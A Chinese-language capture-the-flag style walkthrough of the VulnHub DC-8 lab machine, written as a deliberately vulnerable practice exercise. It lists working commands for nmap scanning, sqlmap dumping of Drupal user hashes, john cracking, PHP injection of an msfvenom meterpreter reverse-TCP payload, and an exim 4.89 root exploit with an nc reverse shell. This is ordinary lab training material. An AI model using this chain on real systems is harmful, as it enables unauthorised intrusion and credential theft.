準備工作

在vulnhub官網下載DC:8靶機DC: 8 ~ VulnHub

匯入到vmware，設定成NAT模式

開啟kali準備進行滲透（ip：192.168.200.6）

資訊收集

利用nmap進行ip埠探測

nmap -sS 192.168.200.6/24 

探測到ip為192.168.200.22的靶機，開放了80埠和22埠

再用nmap對所有埠進行探測，確保沒有別的遺漏資訊　　

nmap -sV -p- 192.168.200.22  

開啟80埠檢視，又是熟悉的介面Drupal 框架，但這次是Drupal7

dirsearch掃目錄發現了xmlrpc.php和後臺登陸頁面

觀察了一下頁面，發現有傳參，判斷可能存在注入，下面進行測試

SQL注入

經過測試發現存在sql注入

利用sqlmap進行攻擊，爆出資料庫d7db

sqlmap -u "http://192.168.200.22/?nid=1" --dbs 

再找到users表

sqlmap -u "http://192.168.200.22/?nid=1" -D d7db --tables

接著爆列名

sqlmap -u "http://192.168.200.22/?nid=1" -D d7db -T 'users' --columns

最後爆資料

sqlmap -u "http://192.168.200.22/?nid=1" -D d7db -T 'users' -C uid,name,pass --dump
 

拿到賬號和加密過後的密碼，看樣子像之前DC3的那種加密，用john來爆

john解密

先將密碼儲存下來之後進行爆破，但是隻爆到了一個密碼

登陸了一下發現不是admin的密碼，john登陸進去了

在後臺發現，可以增加頁面，也可以編輯頁面，和dc7的情況差不多

但是增加的頁面不能選擇以php程式碼執行，找了一會發現 編輯contact us頁面可以以php程式碼執行

試了一下phpinfo();發現沒有顯示，可能只是沒有回顯，但程式碼已經儲存了。接下來我利用msf進行後門監聽

msf後門利用

首先先用msfvenom生成後門，然後用後門的程式碼複製到編輯頁面

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.200.6 LPORT=4444 R > test.php　
 

接著開啟msf，輸入命令進行監聽

use exploit/multi/handler //使用handler模組

set PAYLOAD php/meterpreter/reverse_tcp   //設定payload

set LHOST 192.168.200.6   //監聽

run

然後返回contact us介面，隨便輸入點東西提交，就返回shell到kali了

許可權提升

拿到webshell之後進行提權

先獲取互動式shell

python -c'import pty;pty.spawn("/bin/bash")'

進行簡單的資訊收集

find / -perm -u=s -type f 2>/dev/null

還使用了linux-exploit-suggester-master指令碼去跑漏洞，沒有發現什麼可利用的許可權提升漏洞，看了wp才注意到exim4這個東西

exim是一款在Unix系統上使用的郵件服務，exim4在使用時具有root許可權。查詢一下關於exim4的漏洞，首先看看版本

exim 4.89

找到了對應版本的本地提權利用指令碼　

完整路徑是：/usr/share/exploitdb/exploits/+path中的指令碼路徑　

看了下檔案有兩種提權方法，一個是setuid 一個是netcat

在meterpreter會話中將這個檔案上傳到靶機上

upload /usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/shell.sh

　給指令碼檔案新增執行許可權

chmod +x shell.sh

但無論執行什麼都報錯，查了一下是檔案格式導致的。要想執行46996.sh檔案，需要修改檔案format為unix格式

在kali用vi開啟指令碼修改格式 輸入 :set ff=unix，然後再重新上傳指令碼

使用了第一種方法提權失敗-m setuid

第二種方法-m netcat成功，但是很不穩定，過了一會又變成www-data

可以趁root許可權的時候用nc反彈shell維持穩定

進入root過關